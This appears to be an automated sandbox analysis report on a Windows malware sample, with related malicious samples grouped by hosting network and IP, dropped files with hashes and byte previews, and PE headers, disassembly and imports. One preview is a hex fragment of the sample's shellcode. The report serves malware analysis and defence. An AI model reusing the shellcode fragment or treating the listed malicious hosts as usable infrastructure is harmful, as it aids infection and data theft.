	99UbUXnwA9.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	PO-0049003088.exe	Get hash	malicious	FormBook	Browse	47.83.1.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	ZvmRwchN1S.ps1	Get hash	malicious	Vidar	Browse	88.99.125.82
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
	na.elf	Get hash	malicious	Prometei	Browse	88.198.246.242
VODANETInternationalIP-BackboneofVodafoneDE	mips.elf	Get hash	malicious	Unknown	Browse	178.15.1.217
	x86.elf	Get hash	malicious	Unknown	Browse	88.66.228.64
	mips.elf	Get hash	malicious	Unknown	Browse	47.65.3.180
	boatnet.x86_64.elf	Get hash	malicious	Mirai	Browse	47.67.78.184
	HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	Shipment Update for Order #003666.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	bimbo-m68k.elf	Get hash	malicious	Unknown	Browse	109.44.45.222
	bimbo-mpsl.elf	Get hash	malicious	Unknown	Browse	188.101.131.36
	bimbo-ppc.elf	Get hash	malicious	Unknown	Browse	84.61.19.210
	k03ldc.spc.elf	Get hash	malicious	Unknown	Browse	146.61.7.85
AMAZON-02US	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	.i.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	13.213.51.196
	aramco requesting quotation.exe	Get hash	malicious	FormBook	Browse	76.223.54.146
	killua.arm5.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	killua.arm7.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
	ub8ehJSePAfc9FYqZIT6.arc.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
LOOPIASE	ZDQZvxRL2e.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	viILoOTXYf.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	yloe82Jp1k.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	lJEn8ko37k.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	44EgbQcEla.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	99UbUXnwA9.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	nnBgprBo1I.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
CLOUDFLARENETUS	PO Rover 2025-04.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	DHL Express_8922309719.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	EncriptadoOOKK50.vbs	Get hash	malicious	Unknown	Browse	104.21.80.1
	foto_whatsapp_2025-03-31.img.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	Fizet#U00e9si_m#U00e1solat_UniCredit Bank_Hungary.bat	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	https://check.cymyv.icu/gkcxv.google	Get hash	malicious	Unknown	Browse	104.21.48.1
	Employee Plan Selection.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	172.67.70.233
	Quote Press Cushion Pad.vbs	Get hash	malicious	Unknown	Browse	104.21.32.1
	Order Specifications for Materials.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Quote Press Cushion Pad.vbs	Get hash	malicious	Unknown	Browse	104.21.64.1

Process:	C:\Users\user\Desktop\eoIIBcxUj3.exe
File Type:	data
Category:	dropped
Size (bytes):	11288
Entropy (8bit):	7.6306513042729005
Encrypted:	false
SSDEEP:	192:b2wF5KLtwCKc+jymytziZ1P8kr51VI+YMw8tR6qJBNgJarEVcj1nIstq:b3F4LtwCSymyteZ2Q1Vji70OJhVs1IsM
MD5:	2981AF49DD93CAE9AE1C6D5B92AB6482
SHA1:	E110373408683F01C72E25D617B091D56F445EAB
SHA-256:	9B24987BC767FADAEDABC41B611FB094C39B9AFDBC29B01FC05A16D387225699
SHA-512:	FCAD78CB35793F3DC0D0EDA38F68A64A07F7356D4B520408979F79B10EF4BC5A58108C4A0817243DFF1D44E3ACE0610A3522BD9E1EC36830DE0BC979DC3BFB38
Malicious:	false
Reputation:	low
Preview:	EA06.....L%W.T....J.R.,....L@. .&a.....X............ ....3`."q.......x...@..M...6...d.I..Hbp..(.g.a.l..`....B.l........l.. ...c3............->.............lf....N.6?I........>K...@*>....4..,..]....................S...........C..0..$1c....f>...Y@$>`.......H...P...............#...O.l.I.M@.>. .%8.$..>. .$..... x......T.@.5O......~6@-..S...@j........@".5O.......6..., ..`.s6....o.....6....$?;(...0...&.^. ..9...&.^.$..C...f...0....!...'..7.t...>.#...7.t...>........``.S.v.X..a.........@.6....@.77.l...0....6`.c.I.X.f..0....6b.....6b.....66 =....A..}..........A.....lA.....lA....#C...hd.3.hl....Vf@p...cc....'.c....'.c....`$....c...,aZ. .5.j... ...U... ..K.5.F..>.>... ...X..c.\|S......XB.0.....}3f..........&.-..C6`.H.a...........>......]..2v@B54....B51.... .. %.......g.4....f ..T.....`f!..........c...@,>.....6...+,..jn.!.L.,>.....a......,..jn...L.,>......).G....h..v.B>y....3....6.....3..... !.<.....X\|@.H.....`.CS....h.a.M.X>@....z@.93.......T.....\g ..... ....#.X}SP

C:\Users\user\AppData\Local\Temp\aut1F88.tmp

Download File

Process:	C:\Users\user\Desktop\eoIIBcxUj3.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.994432681723551
Encrypted:	true
SSDEEP:	6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
MD5:	8FA33E8E84C5354A288B702B87DD63D2
SHA1:	72E73999DA878FB966E661A7928EE0B5FACBB356
SHA-256:	27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
SHA-512:	9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
Malicious:	false
Reputation:	low
Preview:	.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]\|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517

C:\Users\user\AppData\Local\Temp\p46Q44o9

Download File

Process:	C:\Windows\SysWOW64\sfc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	0.951889861146889
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaWtPqfPk:CfJ6a9xpnQLqtzKWJntPqfM
MD5:	2791D27717CAB5981A0EA5AD07EE6B64
SHA1:	1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75
SHA-256:	A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
SHA-512:	74FE33DD01CD441635EA88876E743B755C1092EAE29C8CA71E108995550C7994B1911295FC68F8B6688F0AC1CDB9313FC9A6714FB65BEA3F4956865978006E6F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\snaith

Download File

Process:	C:\Users\user\Desktop\eoIIBcxUj3.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.994432681723551
Encrypted:	true
SSDEEP:	6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
MD5:	8FA33E8E84C5354A288B702B87DD63D2
SHA1:	72E73999DA878FB966E661A7928EE0B5FACBB356
SHA-256:	27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
SHA-512:	9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
Malicious:	false
Preview:	.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]\|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517

C:\Users\user\AppData\Local\Temp\underbalanced

Download File

Process:	C:\Users\user\Desktop\eoIIBcxUj3.exe
File Type:	ASCII text, with very long lines (57350), with no line terminators
Category:	dropped
Size (bytes):	57350
Entropy (8bit):	2.7900409119053484
Encrypted:	false
SSDEEP:	384:kBV9WjQwYKEVecaiJpqGF2zGVfedBHyI8leWl05L1AyP5y+h8fauFR9I487:6y4gL1AyP8KXp
MD5:	581C7189F2C3334467B680F1E70FD26A
SHA1:	60A19ED64B6F8CB9C567311882DE1102868DD1A9
SHA-256:	F60BA40590A4305D4C12CA3D32BE2FC5C976A9C1B001BC92C432532C593AB684
SHA-512:	5A17EA07B76456B3525481FEC20F080577488492462D694D03DAF053E54C25ED999B6D9DD4E59C7BD560F0A7CF19C7CFAF723C083DC63F64F7B346EAE938C8EC
Malicious:	false
Preview:	0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba750000006689

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.133057707895621
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eoIIBcxUj3.exe
File size:	1'182'208 bytes
MD5:	c2c8b9851e807452f57cd7a1fabec3ba
SHA1:	d38ad61023caa4d2c2b10e3474ed5658d797cc58
SHA256:	64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0
SHA512:	3225598094182173ea751e6309c2f004b41b15ee1b0c390cfe991211d60c78b941cad038ffd20c58e0d62438c04b9f7347eceb384a3f8947fa46c65095b3d52c
SSDEEP:	24576:PAHnh+eWsN3skA4RV1Hom2KXFmIaleK3JvqW3f2tn5:yh+ZkldoPK1XalD3Vf+
TLSH:	5545AD0273D2C036FFAB92739B6AF60556BD78254133852F13981DB9BD701B2272E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6799D872 [Wed Jan 29 07:27:46 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FADB08E469Dh
jmp 00007FADB08D7454h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FADB08D75DAh
cmp edi, eax
jc 00007FADB08D793Eh
bt dword ptr [004C41FCh], 01h
jnc 00007FADB08D75D9h
rep movsb
jmp 00007FADB08D78ECh
cmp ecx, 00000080h
jc 00007FADB08D77A4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FADB08D75E0h
bt dword ptr [004BF324h], 01h
jc 00007FADB08D7AB0h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FADB08D777Dh
test edi, 00000003h
jne 00007FADB08D778Eh
test esi, 00000003h
jne 00007FADB08D776Dh
bt edi, 02h
jnc 00007FADB08D75DFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FADB08D75E3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FADB08D7635h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x56320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11f000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	f006ab74d3c653b5c5a6cc0c77a171a2	False	0.32829838446475196	data	5.7632462979925245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x56320	0x56400	43f3df0e76be63dc496f493c466bbfeb	False	0.9238734148550725	data	7.884669776507797	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11f000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x4d5e8	data			1.0003344861535355
RT_GROUP_ICON	0x11dda0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11de18	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11de2c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11de40	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11de54	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11df30	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, 